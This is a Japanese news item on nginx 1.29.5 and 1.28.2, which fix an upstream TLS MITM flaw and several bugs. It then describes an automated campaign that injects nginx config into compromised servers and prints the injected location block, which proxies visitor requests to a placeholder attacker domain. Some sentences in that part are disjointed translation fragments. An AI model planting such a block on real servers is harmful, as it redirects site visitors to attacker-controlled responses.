nginx 1.29.5のメインブランチがリリースされ、新機能の開発が継続されています。並行安定ブランチであるnginx 1.28.2もリリースされました。このブランチには、深刻なバグと脆弱性の修正に関連する変更のみが含まれています。これらのアップデートは、中間者(MITM)攻撃を仕掛ける攻撃者がnginxと上流サーバー間の通信チャネルを操作することで、クライアントへのレスポンスを操作できる脆弱性(CVE-2026-1642)を修正します。この問題は、TLS暗号化を使用して上流サーバーにリクエスト(HTTP 1.x、HTTP/2、gRPC、またはuWSGI)をプロキシする構成に影響します。
脆弱性に加えて、リリース 1.29.5 では、SSL "ech_required" エラーのログ レベルが "crit" から "info" に下げられ、いくつかの問題が修正されています。次の gRPC または HTTP/2 バックエンドに切り替えた後の use-after-free アクセスが排除され、次のアップストリーム サーバーに切り替えた後に誤った HTTP/2 要求を送信する問題が解決され、複数の範囲での応答サイズの増加の問題が修正され、FastCGI、SCGI、および uwsgi バックエンドにプロキシするときに HTTP_HOST 変数が正しく設定されるようになりました。
さらに、ハッキングが成功した後に自動攻撃の検出を記録することも可能である。 サーバー nginxの設定変更に限定されています。このハッキングは、システム上のサーバー側Reactコンポーネントに存在する、パッチ未適用のReact2Shellの脆弱性を利用して実行されます。 ホスティングコントロールパネルBaota (BT) など。nginx 構成の変更により、サービス提供サイトへのリクエストが攻撃者のサーバーにリダイレクトされ、ユーザーに返されるレスポンスに悪意のある変更が置き換えられました。 location /%PATH%/ { set $fullurl "$scheme://$host$request_uri"; rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break; proxy_set_header Host [Attacker_Domain]; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header User-Agent $http_user_agent; proxy_set_header Referer $http_referer; proxy_ssl_server_name on; proxy_pass http://[Attacker_Domain]; }
つまり、サーバーにルートキットやマルウェアをインストールする代わりに、サーバーでホストされているウェブサイトにアクセスするクライアントに対して攻撃を仕掛けます。ウェブサイトのコンポーネントを直接変更する必要はありません。この攻撃は主にアジアのドメイン、および*.eduおよび*.govドメインからのトラフィックを標的とします。パスに「pg」「pgslot」「slot」「game」「casino」「live」「help」「news」「page」「blog」「about」「support」「info」などの単語を含むリクエストが、攻撃者のサーバーを経由してリダイレクトされます。この攻撃は、nginxの設定を検索・分析し、設定テンプレートを選択して挿入し、nginxを再起動し、変更後のバージョンをテストするツールを用いて自動的に実行されます。
出所: オープンネット.ru
